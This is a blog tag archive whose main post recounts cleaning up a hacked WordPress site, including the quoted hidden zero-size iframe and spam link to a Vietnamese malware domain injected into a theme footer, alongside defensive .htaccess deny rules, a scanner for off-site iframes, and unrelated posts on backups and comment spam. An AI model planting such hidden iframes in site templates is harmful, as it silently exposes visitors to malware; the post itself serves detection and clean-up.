Tag Archive: MySQL

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked. I quickly ripped out a heap of dodgy files left by the hackers, but for some days now Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn…”.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….
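Whether that block refuses what it is meant to refuse depends on the Order line. With "order allow,deny" a request must match an Allow and must not match a Deny, so 112.78.15.230 is rejected; the same two directives under "order deny,allow" would let it straight through, because the later "allow from all" overrides the deny. The Python below is an added example, not code from the original post, that models those Apache 2.2 mod_authz_host rules over the block's directives so the decision can be checked before the file goes live (a syntax slip in .htaccess takes the whole site down with a 500). Two caveats the block itself does not show: a /8 is 16,777,216 addresses, far more than one country, and the rules inside "Limit GET POST" apply only to GET (with HEAD) and POST, which is why Apache's documentation steers access control towards LimitExcept instead. The rule and function names are mine.

```python
import ipaddress

# Constructed representation of the .htaccess block quoted in the post:
#   <Limit GET POST> / order allow,deny / deny from 112.0.0.0/8 / allow from all
HTACCESS_RULES = {
    "order": "allow,deny",
    "allow": ["all"],
    "deny": ["112.0.0.0/8"],
}

# The same two directives with the Order reversed (constructed, to show the difference).
REVERSED_ORDER_RULES = dict(HTACCESS_RULES, order="deny,allow")


def rule_matches(rule: str, client_ip: str) -> bool:
    """True if one 'allow from' / 'deny from' argument covers client_ip.

    Handles 'all', a single address and CIDR notation. The host-name and
    partial-octet forms that mod_authz_host also accepts are not modelled.
    """
    if rule.lower() == "all":
        return True
    try:
        network = ipaddress.ip_network(rule, strict=False)
    except ValueError:
        return False
    return ipaddress.ip_address(client_ip) in network


def access_decision(rules: dict, client_ip: str) -> str:
    """Model the Apache 2.2 mod_authz_host decision for the two Order values.

    allow,deny: the client must match an Allow AND must not match a Deny; default deny.
    deny,allow: the client is refused only if it matches a Deny and no Allow; default allow.
    """
    allowed = any(rule_matches(r, client_ip) for r in rules.get("allow", []))
    denied = any(rule_matches(r, client_ip) for r in rules.get("deny", []))
    order = rules["order"].replace(" ", "").lower()
    if order == "allow,deny":
        return "allowed" if allowed and not denied else "denied"
    if order == "deny,allow":
        return "denied" if denied and not allowed else "allowed"
    raise ValueError(f"unsupported Order value: {rules['order']!r}")


def addresses_in(cidr: str) -> int:
    """How many addresses a 'deny from' prefix really covers (a /8 is 16,777,216)."""
    return ipaddress.ip_network(cidr, strict=False).num_addresses


if __name__ == "__main__":
    for ip in ("112.78.15.230", "8.8.8.8"):
        print(ip, "->", access_decision(HTACCESS_RULES, ip),
              "| with Order deny,allow ->", access_decision(REVERSED_ORDER_RULES, ip))
    print("112.0.0.0/8 covers", addresses_in("112.0.0.0/8"), "addresses")
```

Run it as-is and the post's rules deny 112.78.15.230 and allow 8.8.8.8; flip the Order and the Vietnamese address is allowed again, which is the mistake the model is there to catch.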

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere. This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area) fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230. This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above.

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, MySQL database and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer! On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam.)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine… but to be sure, I downloaded a fresh copy of the theme and checked its footer file – it’s clean! I then uploaded the whole clean Suffusion theme in its entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.
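The check that would have found this straight away, written here as an added example rather than code from the post or from the Suffusion theme: parse each theme file as HTML and report every iframe, script and link whose target host is not the site's own, flagging iframes sized 0×0 as the hidden kind used here. The footer text below is a constructed stand-in that contains the injected tags quoted above; the class, function and file names are mine.

```python
import os
from html.parser import HTMLParser
from urllib.parse import urlparse


class OffSiteTagFinder(HTMLParser):
    """Collect <iframe>, <script> and <a> tags whose target host is not one of ours."""

    def __init__(self, site_hosts):
        super().__init__()
        self.site_hosts = {h.lower() for h in site_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script", "a"):
            return
        # Bare attributes such as 'nosize' arrive with value None; normalise to "".
        attr = {name.lower(): (value or "") for name, value in attrs}
        target = attr.get("href") if tag == "a" else attr.get("src")
        if not target:
            return
        host = urlparse(target.strip()).hostname
        if host is None or host.lower() in self.site_hosts:
            return  # relative path or our own domain: not an injection indicator
        hidden = tag == "iframe" and "0" in (
            attr.get("width", "").strip(), attr.get("height", "").strip())
        self.findings.append({
            "tag": tag,
            "host": host.lower(),
            "line": self.getpos()[0],  # line in the file, for going straight to it
            "hidden": hidden,
        })


def scan_html(text, site_hosts):
    """Return the off-site findings for one HTML/PHP file's text."""
    parser = OffSiteTagFinder(site_hosts)
    parser.feed(text)
    parser.close()
    return parser.findings


def scan_theme_dir(root, site_hosts, extensions=(".php", ".html", ".htm")):
    """Walk a theme directory; return {relative_path: findings} for files that have any."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_html(fh.read(), site_hosts)
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report


# Constructed stand-in for a theme footer.php carrying the injected tags from the post.
SAMPLE_FOOTER = """<?php /* constructed footer.php stand-in */ ?>
<div id="footer"><a href="http://strangelyperfect.tv/">Home</a> <a href="/about/">About</a></div>
<?php wp_footer(); ?>
<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>
"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_FOOTER, ["strangelyperfect.tv"]):
        flag = "HIDDEN IFRAME" if f["hidden"] else "off-site"
        print(f"line {f['line']}: <{f['tag']}> -> {f['host']}  [{flag}]")
```

Point scan_theme_dir at a downloaded copy of the theme and compare the report against a scan of the vendor's fresh download: a clean theme should produce no off-site iframes at all, so any hidden one is worth a look regardless of which host it names.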

A recheck on Sucuri shows my website to be okay now. See screendump below. I’ll be using Sucuri a lot more!

Sucuri Site Check


Site Outage

Strangely post on September 7th, 2011

My host, Site5.com, has kindly told me that this site (and others of mine) will be off-line from tonight for 3 hours from 07 Sep 2011 23:00 GMT/UTC until 08 Sep 2011 02:00 GMT/UTC.  (I’ve had to convert this from the email which is CDT specific…)

This is due to an upgrade of the MySQL databases to something called Percona, which is a new one on me! Checking it out, it is a custom install of MySQL, with extra management software clagged on.


What is the Best Backup for Windows in a Small Home or Office?

Which Windows Backup?  A History.

Over the years I’ve tried many systems for backing up crucial Windows data. Currently for small-scale backups I use the ubiquitous and almost bullet-proof flash drives, my current one tipping the scales at 8Gb. But for major backups, as the years have passed, I’ve used:

  1. Floppy discs – 1.4Mb
  2. Iomega Zip discs – 100Mb
  3. CDRW – 650Mb
  4. DVD-R – 4.7Gb
  5. Western Digital My Book Home Edition – 1Tb

They all had their problems and limitations. The last one looked good with Firewire, USB2, ethernet & eSATA connections – but it overheated and broke…

Best Windows Backup!

My current system is from Synology and is a “DS210j – Budget-friendly 2-bay NAS server for Home and Small Business”

See: http://www.synology.com/enu/products/DS210j/index.php

I can heartily recommend the thing.  It has so much gubbins within it and far exceeds my limited expectations.  I installed two green 2Tb drives from Western Digital  in mirrored RAID for security and use the auto-backup software provided as well as Windows’ own.  This is extremely relevant for the large number of hits I’ve had to this posting where a major part of the problem is the time taken to do a backup!  In my case, the 750Gb just takes a few hours to copy across the Gigabit speed ethernet that the unit can use.

Addendum June 2011: The tool is a seriously capable bit of kit and I cannot recommend it enough. Get one!

It does everything it says on the tin, and more!  The whole thing cost me about 200 quid, plus an hour of my time to install.

Even its firewall is more configurable than any router I’ve used! It can be used as a server for FTP or the web. It comes with software for a host of things that mimic Flickr etc. but without all the privacy or security issues inherent in off-line storage. It’ll also run with any operating system because it itself is a mini-Linux installation, and includes Windows, Apple and Linux applications.
Check it out, straight from their overview page:

Build Your Entertainment Center

Download Station 2 functions as a 24×7 BitTorrent, FTP, HTTP, eMule, and NZB download center. RapidShare and RSS download are now supported.

DLNA Compliant Media Server ensures compatibility and interoperability between Disk Station and a wide range of DLNA-certified home devices.

iTunes Server provides an easy way to share music and videos with other iTunes clients within the local network. You can create playlists with songs that match the criteria you specified, and best of all, iTunes will update these playlists automatically as you add or delete songs.

Audio Station supports music, Internet radio stations, and iPod playback with connected USB speakers. Web-streaming mode allows your music to be shared with multiple users over the Internet.

Back Up Your Precious Data

DSM 2.2 offers comprehensive solutions for you to back up data stored on Disk Station or your desktop computer to the Disk Station.

Server backup includes two alternatives: Network Backup and Local Backup. Both allow you to back up data in the shared folders and databases. Incremental backup option and flexible schedules are available. All can be easily configured with a step-by-step wizard.

Desktop backup provides Windows PC users with the Synology Data Replicator 3 for backing up desktop data, Outlook, and Outlook Express emails to their Disk Station by choosing one of the three backup modes: Immediate, Sync, and Scheduled backup, while Mac OS X users can use Apple Time Machine backup application to back up their critical data to Disk Station.

USBCopy allows you to quickly back up your data from an USB storage device such as an USB flash or USB card reader to the Disk Station with just one single touch on the front-panel Copy button.

Enrich Your Web Presence

Photo Station 3 simplifies photo, video, and blog sharing over the Internet. The flexibility of photo theme customization, blog layout arrangement, visitor’s privilege setting, RSS feed, and the dazzling 3-dimensional photo browsing with Cooliris make Photo Station 3 your state-of-the-art lifestyle sharing center on the Internet.

Web Station with built-in PHP+MySQL allows users to publish their own websites or install numerous popular open-source programs.

Access With Your iPhone/Mobile Device

The iPhone App DS audio allows Disk Station users to stream music stored on Disk Station with their iPhone/iPod® touch where Internet access is available, while DS photo allows uploading photos from the iPhone/iPod® touch to their Disk Station.

Users with a mobile device running on Windows Mobile® 6.0, iPhone OS 2.2.1 onward, or Symbian OS 9.1 can log on their Disk Station to view photos with Mobile Photo Station and read supported file formats with Mobile File Station where Internet access is available.

Eco Friendly

Synology Disk Station is designed and developed perpetually with the concept of energy saving. Compared with average PC counterparts, Synology Disk Station consumes a relatively low amount of power and has the HDDs hibernate when not in use. This not only helps to save energy but also extends the lifespan of the hard disk.

Synology Disk Station truly earns the title of “green product” because of the unique Scheduled Power On/Off feature, and the smart fan design effectively cools down the system with minimum power consumption, yet keeps the system quiet on operation.

Finally, all Synology products are produced with RoHS compliant parts and packed with recyclable packing materials. Synology recognizes its responsibility as a global citizen and is continually working to reduce the environmental impact of the products we create.


Pligg Comment Spam

Introduction

An unfortunate consequence of posting stuff online is that you expose your ‘work’, ‘your words of wisdom’, your ‘copyright’ or your petty scrawlings (choose which you think is the most appropriate) to the world and, as such, it’s freely copyable.

My website is proudly running on WordPress sat on a standard shared hosting LAMP installation.  Millions do likewise as it’s cheap and effective and has an inbuilt SEO optimisation function that if you don’t abuse it, it actually works!

Comment spam is a pain but the various plugins and lockdowns block most of the crap.

Except last night I had two weird ones within half-an-hour of each other, that came from Pligg websites.  I’d never heard of Pligg until then, but it’s another example of CMS software.

The way that the comment spam made it as far as my filters (as most is dumped without my intervention) is that the websites seemed to do everything correctly to get proper pingbacks – except make sense!!!

Green Tea Fat Burner – Greenteafatburner.info

This one appeared against the posting watch-out-for-the-scam-double-bluff, which is highly ironic! Its WHOIS entry is ‘protected’ by WhoisGuard – which is to be expected. It came from IP 67.214.185.157

Weak Bladder Info – Weakbladder.info

This one appeared against the posting rapidshare-wordpress-comment-spam, which is even more ironic, if anything! Its WHOIS entry is ‘protected’ by WhoisGuard – again to be expected. It came from IP 209.31.180.25

Details

Both sites strip out text from websites (like mine), turn the text into postings and even apply ‘votes’ to them.  Sometimes after 3 mins!  The formulaic nature of the design is revealed by the ‘What is the ****** site all about?’ blurb down the side.    This is one, the other is almost identical.

The Weak Bladder site is a place for our community members to add resources and information that are related to Weak Bladder into one spot. We collect all of the relevant information from around the web, post it here, in the hopes that having a single resource will allow us, and you, to save time when researching this topic. If you’d like to help, then register for a free membership and start contributing as an active community member.

Go for it! (not)

Postscript – later today!

Yay!  Got another.  Same blurb etc IP 76.73.41.92  This time it’s jointpainreliefs.info, and I quote;

The Joint Pain Relief site is a place where we collect information about joint pain, and how to overcome it, in one spot. We are a community dedicated to bringing you the best resources from around the web. If you’d like to join our community and help, signup! It’s free…

Perhaps I didn’t make it clear before, but the ‘joint pain reliefs’ contains everything… except… joint pain reliefs! It appeared on my highly related (not) post Rapidshare WordPress Comment Spam. What is it about this post that attracts the comment spammers? Surely they’re not going for the phrase ‘Comment Spam’? And don’t call me Shirley!

Post-Postscript 9 June 2009

I’ve got another two almost identical comment spam/content scraping hits against the same post Rapidshare WordPress Comment Spam!!!  What is their game…

So I’m going to make a little list of them now.  Also, I’m starting a competition to guess the next bizarre subject matter of the Pligg based website.  My guess is eyelashmiteproblem.info, but I could be wrong …  It could be itchyarse.info or something.  It won’t be from these IP addresses though as I’ve blocked them.

So far, I have:

Website                    IP Address
Greenteafatburner.info     67.214.185.157
Weakbladder.info           209.31.180.25
jointpainreliefs.info      76.73.41.92
menopausereliefsite.info   67.214.185.157
toenailfungusite.info      67.214.185.157

I think it’s time I started adding a few blocks to my .htaccess file, ha ha. If you don’t know how to do this, read here.
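Turning that list into .htaccess entries is the step where a typo hurts: a misspelled directive makes Apache refuse the whole file (HTTP 500 for every visitor), and an argument to "deny from" that is not an address is treated as a host name and looked up in DNS on each request. The Python below is an added example, not the post's own code: it parses the table as shown above, groups the domains by address (three of the five share 67.214.185.157), validates each address with the ipaddress module, and renders one deny line per unique IP in the same "order allow,deny" layout used in the .htaccess block earlier on this page. Function names are mine.

```python
import ipaddress
from collections import defaultdict

# Constructed copy of the "Website / IP Address" list from the post.
PLIGG_SPAM_TABLE = """\
Website IP Address
Greenteafatburner.info 67.214.185.157
Weakbladder.info 209.31.180.25
jointpainreliefs.info 76.73.41.92
menopausereliefsite.info 67.214.185.157
toenailfungusite.info 67.214.185.157
"""


def parse_spam_table(text):
    """Return {ip: [domain, ...]} from 'domain ip' lines.

    The header and blank lines are skipped, and so is any row whose second
    column is not a valid IP address, so nothing unparseable reaches .htaccess.
    """
    by_ip = defaultdict(list)
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue  # header line ("Website IP Address"), blanks, or malformed rows
        domain, ip = parts
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            continue
        by_ip[ip].append(domain.lower())
    return dict(by_ip)


def htaccess_deny_block(by_ip):
    """Render one 'deny from' per unique address in the Order allow,deny layout.

    A '#' comment naming the domains seen on each address keeps the block
    auditable later; Apache ignores comment lines inside <Limit> sections.
    """
    lines = ["<Limit GET POST>", "order allow,deny"]
    for ip in sorted(by_ip, key=ipaddress.ip_address):
        lines.append("# seen from: " + ", ".join(sorted(by_ip[ip])))
        lines.append(f"deny from {ip}")
    lines += ["allow from all", "</Limit>"]
    return "\n".join(lines)


if __name__ == "__main__":
    print(htaccess_deny_block(parse_spam_table(PLIGG_SPAM_TABLE)))
```

The output mirrors the block used earlier on this page, so the same caveat applies: "Limit GET POST" only covers GET (with HEAD) and POST requests, and the three deny lines can be appended to the existing Limit section rather than creating a second one.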

Post-PostScript 14 June 2009

The next entry in the Pligg wall of shame came this morning from:

OnlyOutdoorRugs.info at IP 204.124.181.57. This is a US based host. It targeted this wholly unrelated post of mine, Chatelus Malvaleix on Google Earth Tour de France Map

I’m now left wondering what to do with an Outdoor Rugs, especially when it rains!  The world has gone mad.  Rugs for outside has to be the height of decadence – unless they are normal rugs that you take outside to sit on. But then they’d be indoor rugs. So outdoor rugs must be for dry countries where it never rains.  My brain hurts.


Best and Most Reliable Web Hosting?

Strangely post on March 21st, 2009

I’m looking at getting a new host for (at least some of) my domains. ixWebHosting, who I’ve used for some time, keep falling over and I’m getting a bit fed up with apologetic support ticket replies and no change in service. For about a year they were quite reasonable but since the server move out of Hopkinsville service reliability (a.k.a. ‘uptime’) has gone down.

So in these credit-crunched times, I’m going to let my money do the talking now, and move.

Has anyone got any suggestions?

There are zillions around and each time I check, people say good and bad about all of them!  I’m looking at both sides of the Atlantic this time.


© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me